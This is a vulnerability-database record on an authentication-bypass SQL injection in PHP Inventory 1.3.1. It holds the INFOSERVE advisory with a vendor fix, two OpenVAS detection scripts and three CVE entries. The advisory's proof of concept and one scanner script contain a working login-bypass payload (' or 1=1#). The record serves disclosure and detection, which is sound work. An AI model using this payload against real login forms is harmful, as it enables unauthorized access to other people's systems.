{"id": "SECURITYVULNS:DOC:27388", "bulletinFamily": "software", "title": "PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability", "description": "Advisory: PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability\r\nAdvisory ID: INFOSERVE-ADV2011-08\r\nAuthor: Stefan Schurtz\r\nContact: security@infoserve.de\r\nAffected Software: Successfully tested on PHP Inventory 1.3.1\r\nVendor URL: http://www.phpwares.com/\r\nVendor Status: fixed\r\nCVE-ID: CVE-2009-4595,CVE-2009-4596,CVE-2009-4597\r\n\r\n==========================\r\nVulnerability Description\r\n==========================\r\n\r\nPHP Inventory is (still) prone to a SQL-Injection (Auth Bypass) vulnerability\r\n\r\n==================\r\nPoC-Exploit\r\n==================\r\n\r\nhttp://[target]/php-inventory/index.php \r\n\r\n// with 'magic_quotes_gpc = Off'\r\n\r\nUSER NAME = ' or 1=1#\r\n\r\nor\r\n\r\nUSER NAME = admin\r\nPASSWORD = ' or 1=1#\r\n\r\n=========\r\nSolution\r\n=========\r\n\r\nUpdate to the latest version 1.3.2\r\n\r\n====================\r\nDisclosure Timeline\r\n====================\r\n\r\n29-Nov-2011 - informed vendor (contact form)\r\n30-Nov-2011 - vendor fix\r\n\r\n========\r\nCredits\r\n========\r\n\r\nVulnerabilitiy found and advisory written by the INFOSERVE security team.\r\n\r\n===========\r\nReferences\r\n===========\r\n\r\nhttp://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-08.txt\r\nhttp://www.exploit-db.com/exploits/10370/\r\nhttp://secunia.com/advisories/37672/\r\n", "published": "2011-12-04T00:00:00", "modified": "2011-12-04T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27388", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2009-4597", "CVE-2009-4595", "CVE-2009-4596"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:43", "edition": 1, "viewCount": 71, "enchantments": {"score": {"value": 6.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4595", "CVE-2009-4596", "CVE-2009-4597"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310800983", "OPENVAS:1361412562310802534"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:107425"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12064"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-4595", "CVE-2009-4596", "CVE-2009-4597"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:107425"]}]}, "exploitation": null, "vulnersScore": 6.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}
{"openvas": [{"lastseen": "2020-04-07T16:39:05", "description": "This host is running PHP inventory and is prone to multiple\n vulnerabilities.\n\n This NVT has been replaced by NVT PHP Inventory ", "cvss3": {}, "published": "2010-01-22T00:00:00", "type": "openvas", "title": "PHP Inventory Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-4597", "CVE-2009-4595", "CVE-2009-4596"], "modified": "2020-04-02T00:00:00", "id": "OPENVAS:1361412562310800983", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800983", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# PHP Inventory Multiple Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800983\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-01-22 16:43:14 +0100 (Fri, 22 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-4595\", \"CVE-2009-4596\", \"CVE-2009-4597\");\n script_name(\"PHP Inventory Multiple Vulnerabilities\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37672\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/54666\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/54667\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/10370\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to include arbitrary\n HTML or web scripts in the scope of the browser and allows to obtain and manipulate sensitive information.\");\n\n script_tag(name:\"affected\", value:\"PHP Inventory version 1.2 and prior.\");\n\n script_tag(name:\"insight\", value:\"The Multiple flaws due to,\n\n - Input passed via the 'user_id' parameter to 'index.php' and via the 'sup_id'\n parameter is not properly sanitised before being used in an SQL query.\n\n - Input passed via the 'user' and 'pass' form field to 'index.php' is not\n properly sanitised before being used in an SQL query.\");\n\n script_tag(name:\"solution\", value:\"Update to PHP Inventory version 1.3.2 or later.\");\n\n script_tag(name:\"summary\", value:\"This host is running PHP inventory and is prone to multiple\n vulnerabilities.\n\n This NVT has been replaced by NVT PHP Inventory 'user' and 'pass' Parameters\n SQL Injection Vulnerability (OID: 1.3.6.1.4.1.25623.1.0.802534).\");\n\n script_tag(name:\"qod_type\", value:\"remote_app\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"deprecated\", value:TRUE);\n\n script_xref(name:\"URL\", value:\"http://www.phpwares.com/content/php-inventory\");\n exit(0);\n}\n\nexit(66);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-08T19:10:44", "description": "This host is running PHP inventory and is prone to SQL injection\n vulnerability.", "cvss3": {}, "published": "2011-12-05T00:00:00", "type": "openvas", "title": "PHP Inventory 'user' and 'pass' Parameters SQL Injection Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-4597", "CVE-2009-4595", "CVE-2009-4596"], "modified": "2020-05-06T00:00:00", "id": "OPENVAS:1361412562310802534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802534", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# PHP Inventory 'user' and 'pass' Parameters SQL Injection Vulnerability\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802534\");\n script_version(\"2020-05-06T13:14:18+0000\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-4595\", \"CVE-2009-4596\", \"CVE-2009-4597\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 13:14:18 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-12-05 15:37:27 +0530 (Mon, 05 Dec 2011)\");\n script_name(\"PHP Inventory 'user' and 'pass' Parameters SQL Injection Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Dec/0\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/520692\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/107425/INFOSERVE-ADV2011-08.txt\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to include arbitrary\n HTML or web scripts in the scope of the browser and allows to obtain and manipulate sensitive information.\");\n\n script_tag(name:\"affected\", value:\"PHP Inventory version 1.3.1 and prior\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an input passed the to 'user' and 'pass' form field\n in 'index.php' is not properly sanitised before being used in an SQL query.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to PHP Inventory version 1.3.2 or later\");\n\n script_tag(name:\"summary\", value:\"This host is running PHP inventory and is prone to SQL injection\n vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod\", value:\"50\"); # Vuln check below is quite unreliable\n script_xref(name:\"URL\", value:\"http://www.phpwares.com/content/php-inventory\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = http_get_port( default:80 );\n\nif( ! http_can_host_php( port:port ) ) exit( 0 );\n\nhost = http_host_name( port:port );\n\nforeach dir( make_list_unique( \"/\", \"/php-inventory\", http_cgi_dirs( port:port ) ) ) {\n\n if( dir == \"/\" ) dir = \"\";\n url = dir + \"/index.php\";\n\n variables = string(\"user=admin&pass=%27+or+1%3D1%23\");\n\n req = string( \"POST \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"Content-Length: \", strlen(variables),\n \"\\r\\n\\r\\n\", variables );\n res = http_keepalive_send_recv( port:port, data:req );\n\n if( egrep( pattern:\"^HTTP/.* 302 Found\", string:res ) && \"Location: index.php\" >< res ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:24", "description": "", "cvss3": {}, "published": "2011-11-30T00:00:00", "type": "packetstorm", "title": "PHP Inventory 1.3.1 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-4597", "CVE-2009-4595", "CVE-2009-4596"], "modified": "2011-11-30T00:00:00", "id": "PACKETSTORM:107425", "href": "https://packetstormsecurity.com/files/107425/PHP-Inventory-1.3.1-SQL-Injection.html", "sourceData": "`Advisory: PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability \nAdvisory ID: INFOSERVE-ADV2011-08 \nAuthor: Stefan Schurtz \nContact: security@infoserve.de \nAffected Software: Successfully tested on PHP Inventory 1.3.1 \nVendor URL: http://www.phpwares.com/ \nVendor Status: fixed \nCVE-ID: CVE-2009-4595,CVE-2009-4596,CVE-2009-4597 \n \n========================== \nVulnerability Description \n========================== \n \nPHP Inventory is (still) prone to a SQL-Injection (Auth Bypass) vulnerability \n \n================== \nPoC-Exploit \n================== \n \nhttp://[target]/php-inventory/index.php \n \n// with 'magic_quotes_gpc = Off' \n \nUSER NAME = ' or 1=1# \n \nor \n \nUSER NAME = admin \nPASSWORD = ' or 1=1# \n \n========= \nSolution \n========= \n \nUpdate to the latest version 1.3.2 \n \n==================== \nDisclosure Timeline \n==================== \n \n29-Nov-2011 - informed vendor (contact form) \n30-Nov-2011 - vendor fix \n \n======== \nCredits \n======== \n \nVulnerabilitiy found and advisory written by the INFOSERVE security team. \n \n=========== \nReferences \n=========== \n \nhttp://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-08.txt \nhttp://www.exploit-db.com/exploits/10370/ \nhttp://secunia.com/advisories/37672/ \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/107425/INFOSERVE-ADV2011-08.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2021-06-08T18:47:25", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2011-12-05T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2011-4025", "CVE-2011-4357", "CVE-2011-4448", "CVE-2009-4597", "CVE-2009-4595", "CVE-2009-4596"], "modified": "2011-12-05T00:00:00", "id": "SECURITYVULNS:VULN:12064", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12064", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T21:39:50", "description": "SQL injection vulnerability in index.php in PHP Inventory 1.2 allows remote authenticated users to execute arbitrary SQL commands via the sup_id parameter in a suppliers details action. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.", "cvss3": {}, "published": "2010-01-12T17:30:00", "type": "cve", "title": "CVE-2009-4595", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4595"], "modified": "2010-01-13T05:00:00", "cpe": ["cpe:/a:phpwares:php_inventory:1.2"], "id": "CVE-2009-4595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4595", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpwares:php_inventory:1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T21:39:50", "description": "Cross-site scripting (XSS) vulnerability in index.php in PHP Inventory 1.2 allows remote attackers to inject arbitrary web script or HTML via the sup_id parameter in a suppliers details action.", "cvss3": {}, "published": "2010-01-12T17:30:00", "type": "cve", "title": "CVE-2009-4596", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4596"], "modified": "2017-08-17T01:31:00", "cpe": ["cpe:/a:phpwares:php_inventory:1.2"], "id": "CVE-2009-4596", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4596", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpwares:php_inventory:1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T21:39:50", "description": "Multiple SQL injection vulnerabilities in index.php in PHP Inventory 1.2 allow (1) remote authenticated users to execute arbitrary SQL commands via the user_id parameter in a users details action, and allow remote attackers to execute arbitrary SQL commands via the (2) user (username) and (3) pass (password) parameters. NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2010-01-12T17:30:00", "type": "cve", "title": "CVE-2009-4597", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4597"], "modified": "2017-08-17T01:31:00", "cpe": ["cpe:/a:phpwares:php_inventory:1.2"], "id": "CVE-2009-4597", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4597", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpwares:php_inventory:1.2:*:*:*:*:*:*:*"]}]}
